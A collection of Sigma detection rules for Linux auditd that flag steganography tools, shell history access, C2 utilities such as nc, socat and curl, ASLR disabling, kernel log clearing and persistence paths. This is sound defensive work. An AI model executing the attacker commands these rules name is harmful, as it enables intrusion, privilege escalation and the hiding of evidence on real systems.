description: Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.
references:
- https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/
author: 'Pawel Mazur'
date: 2021-09-11
modified: 2022-10-09
tags:
- attack.defense-evasion
- attack.t1027.003
logsource:
product: linux
service: auditd
detection:
selection:
type: EXECVE
a0: steghide
a1: embed
a2:
- '-cf'
- '-ef'
a4:
- '-cf'
- '-ef'
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_steghide_extract_steganography.yml
================================================
title: Steganography Extract Files with Steghide
id: a5a827d9-1bbe-4952-9293-c59d897eb41b
status: test
description: Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.
references:
- https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/
author: 'Pawel Mazur'
date: 2021-09-11
modified: 2022-10-09
tags:
- attack.defense-evasion
- attack.t1027.003
logsource:
product: linux
service: auditd
detection:
selection:
type: EXECVE
a0: steghide
a1: extract
a2: '-sf'
a3|endswith:
- '.jpg'
- '.png'
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_susp_cmds.yml
================================================
title: Suspicious Commands Linux
id: 1543ae20-cbdf-4ec1-8d12-7664d667a825
status: test
description: Detects relevant commands often related to malware or hacking activity
references:
- Internal Research - mostly derived from exploit code including code in MSF
author: Florian Roth (Nextron Systems)
date: 2017-12-12
modified: 2022-10-05
tags:
- attack.execution
- attack.t1059.004
logsource:
product: linux
service: auditd
detection:
cmd1:
type: 'EXECVE'
a0: 'chmod'
a1: 777
cmd2:
type: 'EXECVE'
a0: 'chmod'
a1: 'u+s'
cmd3:
type: 'EXECVE'
a0: 'cp'
a1: '/bin/ksh'
cmd4:
type: 'EXECVE'
a0: 'cp'
a1: '/bin/sh'
condition: 1 of cmd*
falsepositives:
- Admin activity
level: medium
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_susp_histfile_operations.yml
================================================
title: Suspicious History File Operations - Linux
id: eae8ce9f-bde9-47a6-8e79-f20d18419910
status: test
description: 'Detects commandline operations on shell history files'
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
author: 'Mikhail Larin, oscd.community'
date: 2020-10-17
modified: 2022-11-28
tags:
- attack.credential-access
- attack.t1552.003
logsource:
product: linux
service: auditd
detection:
execve:
type: EXECVE
history:
- '.bash_history'
- '.zsh_history'
- '.zhistory'
- '.history'
- '.sh_history'
- 'fish_history'
condition: execve and history
falsepositives:
- Legitimate administrative activity
- Legitimate software, cleaning hist file
level: medium
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_susp_service_reload_or_restart.yml
================================================
title: Service Reload or Start - Linux
id: 2625cc59-0634-40d0-821e-cb67382a3dd7
status: test
description: Detects the start, reload or restart of a service.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md
author: Jakob Weinzettl, oscd.community, CheraghiMilad
date: 2019-09-23
modified: 2025-03-03
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1543.002
logsource:
product: linux
service: auditd
detection:
selection:
type: 'EXECVE'
a0|contains:
- 'systemctl'
- 'service'
a1|contains:
- 'reload'
- 'start'
condition: selection
falsepositives:
- Installation of legitimate service.
- Legitimate reconfiguration of service.
- Command line contains daemon-reload.
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_system_shutdown_reboot.yml
================================================
title: System Shutdown/Reboot - Linux
id: 4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f
status: test
description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md
author: 'Igor Fits, oscd.community'
date: 2020-10-15
modified: 2022-11-26
tags:
- attack.impact
- attack.t1529
logsource:
product: linux
service: auditd
detection:
execve:
type: 'EXECVE'
shutdowncmd:
- 'shutdown'
- 'reboot'
- 'halt'
- 'poweroff'
init:
- 'init'
- 'telinit'
initselection:
- 0
- 6
condition: execve and (shutdowncmd or (init and initselection))
falsepositives:
- Legitimate administrative activity
level: informational
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_unzip_hidden_zip_files_steganography.yml
================================================
title: Steganography Unzip Hidden Information From Picture File
id: edd595d7-7895-4fa7-acb3-85a18a8772ca
status: test
description: Detects extracting of zip file from image file
references:
- https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/
author: 'Pawel Mazur'
date: 2021-09-09
modified: 2022-10-09
tags:
- attack.defense-evasion
- attack.t1027.003
logsource:
product: linux
service: auditd
detection:
commands:
type: EXECVE
a0: unzip
a1:
a1|endswith:
- '.jpg'
- '.png'
condition: commands and a1
falsepositives:
- Unknown
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_user_discovery.yml
================================================
title: System Owner or User Discovery - Linux
id: 9a0d8ca0-2385-4020-b6c6-cb6153ca56f3
status: test
description: |
Detects the execution of host or user discovery utilities such as "whoami", "hostname", "id", etc.
Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md
author: Timur Zinniatullin, oscd.community
date: 2019-10-21
modified: 2025-06-04
tags:
- attack.discovery
- attack.t1033
logsource:
product: linux
service: auditd
detection:
selection:
type: 'EXECVE'
a0:
- 'hostname'
- 'id'
- 'last'
- 'uname'
- 'users'
- 'w'
- 'who'
- 'whoami'
condition: selection
falsepositives:
- Admin activity
level: low
================================================
FILE: rules/linux/auditd/lnx_auditd_audio_capture.yml
================================================
title: Audio Capture
id: a7af2487-9c2f-42e4-9bb9-ff961f0561d5
status: test
description: Detects attempts to record audio using the arecord and ecasound utilities.
references:
- https://linux.die.net/man/1/arecord
- https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa
- https://manpages.debian.org/unstable/ecasound/ecasound.1.en.html
- https://ecasound.seul.org/ecasound/Documentation/examples.html#fconversions
author: Pawel Mazur, Milad Cheraghi
date: 2021-09-04
modified: 2025-12-05
tags:
- attack.collection
- attack.t1123
logsource:
product: linux
service: auditd
detection:
selection_execve:
type: EXECVE
a0: arecord
a1: '-vv'
a2: '-fdat'
selection_syscall_memfd_create:
type: SYSCALL
exe|endswith: "/ecasound"
SYSCALL: 'memfd_create'
condition: 1 of selection_*
falsepositives:
- Unknown
level: low
================================================
FILE: rules/linux/auditd/lnx_auditd_disable_aslr_protection.yml
================================================
title: ASLR Disabled Via Sysctl or Direct Syscall - Linux
id: e497a24e-9345-4a62-9803-b06d7d7cb132
status: experimental
description: |
Detects actions that disable Address Space Layout Randomization (ASLR) in Linux, including:
- Use of the `personality` syscall with the ADDR_NO_RANDOMIZE flag (0x0040000)
- Modification of the /proc/sys/kernel/randomize_va_space file
- Execution of the `sysctl` command to set `kernel.randomize_va_space=0`
Disabling ASLR is often used by attackers during exploit development or to bypass memory protection mechanisms.
A successful use of these methods can reduce the effectiveness of ASLR and make memory corruption attacks more reliable.
references:
- https://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config/blob/f1c478a37911a5447d5ffcd580f22b167bf3df14/personality-syscall/README.md
- https://man7.org/linux/man-pages/man2/personality.2.html
- https://manual.cs50.io/2/personality
- https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/
author: Milad Cheraghi
date: 2025-05-26
modified: 2025-12-05
tags:
- attack.privilege-escalation
- attack.defense-evasion
- attack.t1562.001
- attack.t1055.009
logsource:
product: linux
service: auditd
detection:
selection_syscall:
type: 'SYSCALL'
SYSCALL: 'personality'
a0: 40000
selection_sysctl:
type: 'EXECVE'
a0: 'sysctl'
a1: '-w'
a2: 'kernel.randomize_va_space=0' # 0 = disable
condition: 1 of selection_*
falsepositives:
- Debugging or legitimate software testing
level: high
================================================
FILE: rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml
================================================
title: Linux Keylogging with Pam.d
id: 49aae26c-450e-448b-911d-b3c13d178dfc
status: test
description: Detect attempt to enable auditing of TTY input
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md
- https://linux.die.net/man/8/pam_tty_audit
- https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing
- https://access.redhat.com/articles/4409591#audit-record-types-2
author: 'Pawel Mazur'
date: 2021-05-24
modified: 2022-12-18
tags:
- attack.collection
- attack.credential-access
- attack.t1003
- attack.t1056.001
logsource:
product: linux
service: auditd
detection:
selection_path_events:
type: PATH
name:
- '/etc/pam.d/system-auth'
- '/etc/pam.d/password-auth'
selection_tty_events:
type:
- 'TTY'
- 'USER_TTY'
condition: 1 of selection_*
falsepositives:
- Administrative work
level: high
================================================
FILE: rules/linux/auditd/lnx_auditd_password_policy_discovery.yml
================================================
title: Password Policy Discovery - Linux
id: ca94a6db-8106-4737-9ed2-3e3bb826af0a
status: stable
description: Detects password policy discovery commands
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md
- https://linux.die.net/man/1/chage
- https://man7.org/linux/man-pages/man1/passwd.1.html
- https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu
author: Ömer Günal, oscd.community, Pawel Mazur
date: 2020-10-08
modified: 2024-12-01
tags:
- attack.discovery
- attack.t1201
logsource:
product: linux
service: auditd
detection:
selection_files:
type: 'PATH'
name:
- '/etc/login.defs'
- '/etc/pam.d/auth'
- '/etc/pam.d/common-account'
- '/etc/pam.d/common-auth'
- '/etc/pam.d/common-password'
- '/etc/pam.d/system-auth'
- '/etc/security/pwquality.conf'
selection_chage:
type: 'EXECVE'
a0: 'chage'
a1:
- '--list'
- '-l'
selection_passwd:
type: 'EXECVE'
a0: 'passwd'
a1:
- '-S'
- '--status'
condition: 1 of selection_*
falsepositives:
- Legitimate administration activities
level: low
================================================
FILE: rules/linux/auditd/lnx_auditd_susp_c2_commands.yml
================================================
title: Suspicious C2 Activities
id: f7158a64-6204-4d6d-868a-6e6378b467e0
status: test
description: |
Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.
This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.
These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)
references:
- https://github.com/Neo23x0/auditd
author: Marie Euler
date: 2020-05-18
modified: 2021-11-27
tags:
- attack.command-and-control
logsource:
product: linux
service: auditd
definition: |
Required auditd configuration:
-w /usr/bin/wget -p x -k susp_activity
-w /usr/bin/curl -p x -k susp_activity
-w /usr/bin/base64 -p x -k susp_activity
-w /bin/nc -p x -k susp_activity
-w /bin/netcat -p x -k susp_activity
-w /usr/bin/ncat -p x -k susp_activity
-w /usr/bin/ss -p x -k susp_activity
-w /usr/bin/netstat -p x -k susp_activity
-w /usr/bin/ssh -p x -k susp_activity
-w /usr/bin/scp -p x -k susp_activity
-w /usr/bin/sftp -p x -k susp_activity
-w /usr/bin/ftp -p x -k susp_activity
-w /usr/bin/socat -p x -k susp_activity
-w /usr/bin/wireshark -p x -k susp_activity
-w /usr/bin/tshark -p x -k susp_activity
-w /usr/bin/rawshark -p x -k susp_activity
-w /usr/bin/rdesktop -p x -k susp_activity
-w /usr/local/bin/rdesktop -p x -k susp_activity
-w /usr/bin/wlfreerdp -p x -k susp_activity
-w /usr/bin/xfreerdp -p x -k susp_activity
-w /usr/local/bin/xfreerdp -p x -k susp_activity
-w /usr/bin/nmap -p x -k susp_activity
(via https://github.com/Neo23x0/auditd/blob/ddf2603dbc985f97538d102f13b4e4446b402bae/audit.rules#L336)
detection:
selection:
key: 'susp_activity'
condition: selection
falsepositives:
- Admin or User activity
level: medium
================================================
FILE: rules/linux/auditd/lnx_auditd_system_info_discovery.yml
================================================
title: System Information Discovery - Auditd
id: f34047d9-20d3-4e8b-8672-0a35cc50dc71
status: test
description: Detects System Information Discovery commands
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1082/T1082.md
author: Pawel Mazur
date: 2021-09-03
modified: 2023-03-06
tags:
- attack.discovery
- attack.t1082
logsource:
product: linux
service: auditd
detection:
selection_1:
type: PATH
name:
- /etc/lsb-release
- /etc/redhat-release
- /etc/issue
selection_2:
type: EXECVE
a0:
- uname
- uptime
- lsmod
- hostname
- env
selection_3:
type: EXECVE
a0: grep
a1|contains:
- vbox
- vm
- xen
- virtio
- hv
selection_4:
type: EXECVE
a0: kmod
a1: list
condition: 1 of selection_*
falsepositives:
- Likely
level: low
================================================
FILE: rules/linux/auditd/path/lnx_auditd_auditing_config_change.yml
================================================
title: Auditing Configuration Changes on Linux Host
id: 977ef627-4539-4875-adf4-ed8f780c4922
status: test
description: Detect changes in auditd configuration files
references:
- https://github.com/Neo23x0/auditd/blob/master/audit.rules
- Self Experience
author: Mikhail Larin, oscd.community
date: 2019-10-25
modified: 2021-11-27
tags:
- attack.defense-evasion
- attack.t1562.006
logsource:
product: linux
service: auditd
detection:
selection:
type: PATH
name:
- /etc/audit/*
- /etc/libaudit.conf
- /etc/audisp/*
condition: selection
falsepositives:
- Legitimate administrative activity
level: high
================================================
FILE: rules/linux/auditd/path/lnx_auditd_bpfdoor_file_accessed.yml
================================================
title: BPFDoor Abnormal Process ID or Lock File Accessed
id: 808146b2-9332-4d78-9416-d7e47012d83d
status: test
description: detects BPFDoor .lock and .pid files access in temporary file storage facility
references:
- https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/
- https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor
author: Rafal Piasecki
date: 2022-08-10
tags:
- attack.execution
- attack.t1106
- attack.t1059
logsource:
product: linux
service: auditd
detection:
selection:
type: 'PATH'
name:
- /var/run/haldrund.pid
- /var/run/xinetd.lock
- /var/run/kdevrund.pid
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/linux/auditd/path/lnx_auditd_hidden_binary_execution.yml
================================================
title: Use Of Hidden Paths Or Files
id: 9e1bef8d-0fff-46f6-8465-9aa54e128c1e
related:
- id: d08722cd-3d09-449a-80b4-83ea2d9d4616
type: similar
status: test
description: Detects calls to hidden files or files located in hidden directories in NIX systems.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md
author: David Burkett, @signalblur
date: 2022-12-30
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.t1574.001
logsource:
product: linux
service: auditd
detection:
selection:
type: 'PATH'
name|contains: '/.'
filter:
name|contains:
- '/.cache/'
- '/.config/'
- '/.pyenv/'
- '/.rustup/toolchains'
condition: selection and not filter
falsepositives:
- Unknown
level: low
================================================
FILE: rules/linux/auditd/path/lnx_auditd_ld_so_preload_mod.yml
================================================
title: Modification of ld.so.preload
id: 4b3cb710-5e83-4715-8c45-8b2b5b3e5751
status: test
description: Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md
- https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html
author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community
date: 2019-10-24
modified: 2021-11-27
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.t1574.006
logsource:
product: linux
service: auditd
detection:
selection:
type: 'PATH'
name: '/etc/ld.so.preload'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/auditd/path/lnx_auditd_logging_config_change.yml
================================================
title: Logging Configuration Changes on Linux Host
id: c830f15d-6f6e-430f-8074-6f73d6807841
status: test
description: Detect changes of syslog daemons configuration files
references:
- self experience
author: Mikhail Larin, oscd.community
date: 2019-10-25
modified: 2021-11-27
tags:
- attack.defense-evasion
- attack.t1562.006
logsource:
product: linux
service: auditd
detection:
selection:
type: 'PATH'
name:
- /etc/syslog.conf
- /etc/rsyslog.conf
- /etc/syslog-ng/syslog-ng.conf
condition: selection
falsepositives:
- Legitimate administrative activity
level: high
================================================
FILE: rules/linux/auditd/path/lnx_auditd_magic_system_request_key.yml
================================================
title: Potential Abuse of Linux Magic System Request Key
id: ea61bb82-a5e0-42e6-8537-91d29500f1b9
status: experimental
description: |
Detects the potential abuse of the Linux Magic SysRq (System Request) key by adversaries with root or sufficient privileges
to silently manipulate or destabilize a system. By writing to /proc/sysrq-trigger, they can crash the system, kill processes,
or disrupt forensic analysis—all while bypassing standard logging. Though intended for recovery and debugging, SysRq can be
misused as a stealthy post-exploitation tool. It is controlled via /proc/sys/kernel/sysrq or permanently through /etc/sysctl.conf.
references:
- https://www.kernel.org/doc/html/v4.10/_sources/admin-guide/sysrq.txt
- https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/4/html/reference_guide/s3-proc-sys-kernel
- https://www.splunk.com/en_us/blog/security/threat-update-awfulshred-script-wiper.html
author: Milad Cheraghi
date: 2025-05-23
tags:
- attack.execution
- attack.t1059.004
- attack.impact
- attack.t1529
- attack.t1489
- attack.t1499
logsource:
product: linux
service: auditd
definition: |
Required auditd configuration:
-w /proc/sysrq-trigger -p wa -k sysrq
-w /proc/sys/kernel/sysrq -p wa -k sysrq
detection:
selection:
type: 'PATH'
name|endswith:
# Enable
- '/sysrq'
- '/sysctl.conf'
# Execute
- '/sysrq-trigger'
condition: selection
falsepositives:
- Legitimate administrative activity
level: medium
================================================
FILE: rules/linux/auditd/path/lnx_auditd_system_info_discovery2.yml
================================================
title: System and Hardware Information Discovery
id: 1f358e2e-cb63-43c3-b575-dfb072a6814f
related:
- id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239
type: derived
status: stable
description: Detects system information discovery commands
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware
author: Ömer Günal, oscd.community
date: 2020-10-08
modified: 2022-11-26
tags:
- attack.discovery
- attack.t1082
logsource:
product: linux
service: auditd
detection:
selection:
type: 'PATH'
name:
- '/sys/class/dmi/id/bios_version'
- '/sys/class/dmi/id/product_name'
- '/sys/class/dmi/id/chassis_vendor'
- '/proc/scsi/scsi'
- '/proc/ide/hd0/model'
- '/proc/version'
- '/etc/*version'
- '/etc/*release'
- '/etc/issue'
condition: selection
falsepositives:
- Legitimate administration activities
level: informational
================================================
FILE: rules/linux/auditd/path/lnx_auditd_systemd_service_creation.yml
================================================
title: Systemd Service Creation
id: 1bac86ba-41aa-4f62-9d6b-405eac99b485
status: test
description: Detects a creation of systemd services which could be used by adversaries to execute malicious code.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md
author: 'Pawel Mazur'
date: 2022-02-03
modified: 2022-02-06
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1543.002
logsource:
product: linux
service: auditd
detection:
path:
type: 'PATH'
nametype: 'CREATE'
name_1:
name|startswith:
- '/usr/lib/systemd/system/'
- '/etc/systemd/system/'
name_2:
name|contains: '/.config/systemd/user/'
condition: path and 1 of name_*
falsepositives:
- Admin work like legit service installs.
level: medium
================================================
FILE: rules/linux/auditd/path/lnx_auditd_unix_shell_configuration_modification.yml
================================================
title: Unix Shell Configuration Modification
id: a94cdd87-6c54-4678-a6cc-2814ffe5a13d
related:
- id: e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9
type: obsolete
status: test
description: Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened.
references:
- https://objective-see.org/blog/blog_0x68.html
- https://web.archive.org/web/20221204161143/https://www.glitch-cat.com/p/green-lambert-and-attack
- https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
author: Peter Matkovski, IAI
date: 2023-03-06
modified: 2023-03-15
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1546.004
logsource:
product: linux
service: auditd
detection:
selection:
type: 'PATH'
name:
- '/etc/shells'
- '/etc/profile'
- '/etc/profile.d/*'
- '/etc/bash.bashrc'
- '/etc/bashrc'
- '/etc/zsh/zprofile'
- '/etc/zsh/zshrc'
- '/etc/zsh/zlogin'
- '/etc/zsh/zlogout'
- '/etc/csh.cshrc'
- '/etc/csh.login'
- '/root/.bashrc'
- '/root/.bash_profile'
- '/root/.profile'
- '/root/.zshrc'
- '/root/.zprofile'
- '/home/*/.bashrc'
- '/home/*/.zshrc'
- '/home/*/.bash_profile'
- '/home/*/.zprofile'
- '/home/*/.profile'
- '/home/*/.bash_login'
- '/home/*/.bash_logout'
- '/home/*/.zlogin'
- '/home/*/.zlogout'
condition: selection
falsepositives:
- Admin or User activity are expected to generate some false positives
level: medium
================================================
FILE: rules/linux/auditd/service_stop/lnx_auditd_disable_system_firewall.yml
================================================
title: Disable System Firewall
id: 53059bc0-1472-438b-956a-7508a94a91f0
status: test
description: Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md
- https://firewalld.org/documentation/man-pages/firewall-cmd.html
author: 'Pawel Mazur'
date: 2022-01-22
tags:
- attack.t1562.004
- attack.defense-evasion
logsource:
product: linux
service: auditd
detection:
selection:
type: 'SERVICE_STOP'
unit:
- 'firewalld'
- 'iptables'
- 'ufw'
condition: selection
falsepositives:
- Admin activity
level: high
================================================
FILE: rules/linux/auditd/syscall/lnx_auditd_clean_disable_dmesg_logs_via_syslog.yml
================================================
title: Clear or Disable Kernel Ring Buffer Logs via Syslog Syscall
id: eca5e022-d368-4043-98e5-9736fb01f72f
status: experimental
description: |
Detects the use of the `syslog` syscall with action code 5 (SYSLOG_ACTION_CLEAR),
(4 is SYSLOG_ACTION_READ_CLEAR and 6 is SYSLOG_ACTION_CONSOLE_OFF) which clears the kernel
ring buffer (dmesg logs). This can be used by attackers to hide traces after exploitation
or privilege escalation. A common technique is running `dmesg -c`, which triggers this syscall internally.
references:
- https://man7.org/linux/man-pages/man2/syslog.2.html
- https://man7.org/linux/man-pages/man1/dmesg.1.html
author: Milad Cheraghi
date: 2025-05-27
modified: 2025-12-05
tags:
- attack.defense-evasion
- attack.t1070.002
logsource:
product: linux
service: auditd
definition: |
Required auditd configuration:
-a always,exit -F arch=b64 -S syslog -F a0=4 -k clear_dmesg_logs
-a always,exit -F arch=b64 -S syslog -F a0=5 -k clear_dmesg_logs
-a always,exit -F arch=b64 -S syslog -F a0=6 -k disable_dmesg_logs
-a always,exit -F arch=b32 -S syslog -F a0=4 -k clear_dmesg_logs
-a always,exit -F arch=b32 -S syslog -F a0=5 -k clear_dmesg_logs
-a always,exit -F arch=b32 -S syslog -F a0=6 -k disable_dmesg_logs
detection:
selection:
type: 'SYSCALL'
SYSCALL: 'syslog'
a0:
- 4 # SYSLOG_ACTION_READ_CLEAR : Read and clear log
- 5 # SYSLOG_ACTION_CLEAR: Clear kernel ring buffer (without reading)
- 6 # SYSLOG_ACTION_CONSOLE_OFF: Disable logging to console
condition: selection
falsepositives:
- System administrators or scripts that intentionally clear logs
- Debugging scripts
level: medium
================================================
FILE: rules/linux/auditd/syscall/lnx_auditd_create_account.yml
================================================
title: Creation Of An User Account
id: 759d0d51-bc99-4b5e-9add-8f5b2c8e7512
status: test
description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
references:
- https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files
- https://access.redhat.com/articles/4409591#audit-record-types-2
- https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07
author: Marie Euler, Pawel Mazur
date: 2020-05-18
modified: 2022-12-20
tags:
- attack.t1136.001
- attack.persistence
logsource:
product: linux
service: auditd
detection:
selection_syscall_record_type:
type: 'SYSCALL'
exe|endswith: '/useradd'
selection_add_user_record_type:
type: 'ADD_USER' # This is logged without having to configure audit rules on both Ubuntu and Centos
condition: 1 of selection_*
falsepositives:
- Admin activity
level: medium
================================================
FILE: rules/linux/auditd/syscall/lnx_auditd_load_module_insmod.yml
================================================
title: Loading of Kernel Module via Insmod
id: 106d7cbd-80ff-4985-b682-a7043e5acb72
status: test
description: |
Detects loading of kernel modules with insmod command.
Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.
Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md
- https://linux.die.net/man/8/insmod
- https://man7.org/linux/man-pages/man8/kmod.8.html
author: 'Pawel Mazur'
date: 2021-11-02
modified: 2022-12-25
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1547.006
logsource:
product: linux
service: auditd
detection:
selection:
type: 'SYSCALL'
comm: insmod
exe: /usr/bin/kmod
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/auditd/syscall/lnx_auditd_network_service_scanning.yml
================================================
title: Linux Network Service Scanning - Auditd
id: 3761e026-f259-44e6-8826-719ed8079408
related:
- id: 3e102cd9-a70d-4a7a-9508-403963092f31
type: derived
status: test
description: Detects enumeration of local or remote network services.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md
author: Alejandro Ortuno, oscd.community
date: 2020-10-21
modified: 2023-09-26
tags:
- attack.discovery
- attack.t1046
logsource:
product: linux
service: auditd
definition: 'Configure these rules https://github.com/Neo23x0/auditd/blob/e181243a7c708e9d579557d6f80e0ed3d3483b89/audit.rules#L182-L183'
detection:
selection:
type: 'SYSCALL'
exe|endswith:
- '/telnet'
- '/nmap'
- '/netcat'
- '/nc'
- '/ncat'
- '/nc.openbsd'
key: 'network_connect_4'
condition: selection
falsepositives:
- Legitimate administration activities
level: low
================================================
FILE: rules/linux/auditd/syscall/lnx_auditd_split_file_into_pieces.yml
================================================
title: Split A File Into Pieces - Linux
id: 2dad0cba-c62a-4a4f-949f-5f6ecd619769
status: test
description: 'Detection use of the command "split" to split files into parts and possible transfer.'
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md
author: 'Igor Fits, oscd.community'
date: 2020-10-15
modified: 2022-11-28
tags:
- attack.exfiltration
- attack.t1030
logsource:
product: linux
service: auditd
detection:
selection:
type: 'SYSCALL'
comm: 'split'
condition: selection
falsepositives:
- Legitimate administrative activity
level: low
================================================
FILE: rules/linux/auditd/syscall/lnx_auditd_susp_discovery_sysinfo_syscall.yml
================================================
title: System Info Discovery via Sysinfo Syscall
id: b207d563-a1d9-4275-b349-77d1eb55aa6d
status: experimental
description: |
Detects use of the sysinfo system call in Linux, which provides a snapshot of key system statistics such as uptime, load averages, memory usage, and the number of running processes.
Malware or reconnaissance tools might leverage sysinfo to fingerprint the system - gathering data to determine if it's a viable target.
references:
- https://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config/blob/f1c478a37911a5447d5ffcd580f22b167bf3df14/sysinfo-syscall/README.md
- https://man7.org/linux/man-pages/man2/sysinfo.2.html
author: Milad Cheraghi
date: 2025-05-30
modified: 2025-12-05
tags:
- attack.discovery
- attack.t1057
- attack.t1082
logsource:
product: linux
service: auditd
definition: |
Required auditd configuration:
-a always,exit -F arch=b64 -S sysinfo -k discovery_sysinfo_syscall
-a always,exit -F arch=b32 -S sysinfo -k discovery_sysinfo_syscall
detection:
selection:
type: 'SYSCALL'
SYSCALL: 'sysinfo'
filter_optional_splunk:
exe|endswith: '/bin/splunkd'
condition: selection and not 1 of filter_optional_*
falsepositives:
- Legitimate administrative activity
level: low
================================================
FILE: rules/linux/auditd/syscall/lnx_auditd_susp_exe_folders.yml
================================================
title: Program Executions in Suspicious Folders
id: a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc
status: test
description: Detects program executions in suspicious non-program folders related to malware or hacking activity
references:
- Internal Research
author: Florian Roth (Nextron Systems)
date: 2018-01-23
modified: 2021-11-27
tags:
- attack.t1587
- attack.t1584
- attack.resource-development
logsource:
product: linux
service: auditd
detection:
selection:
type: 'SYSCALL'
exe|startswith:
# Temporary folder
- '/tmp/'
# Web server
- '/var/www/' # Standard
- '/home/*/public_html/' # Per-user
- '/usr/local/apache2/' # Classical Apache
- '/usr/local/httpd/' # Old SuSE Linux 6.* Apache
- '/var/apache/' # Solaris Apache
- '/srv/www/' # SuSE Linux 9.*
- '/home/httpd/html/' # Redhat 6 or older Apache
- '/srv/http/' # ArchLinux standard
- '/usr/share/nginx/html/' # ArchLinux nginx
# Data dirs of typically exploited services (incomplete list)
- '/var/lib/pgsql/data/'
- '/usr/local/mysql/data/'
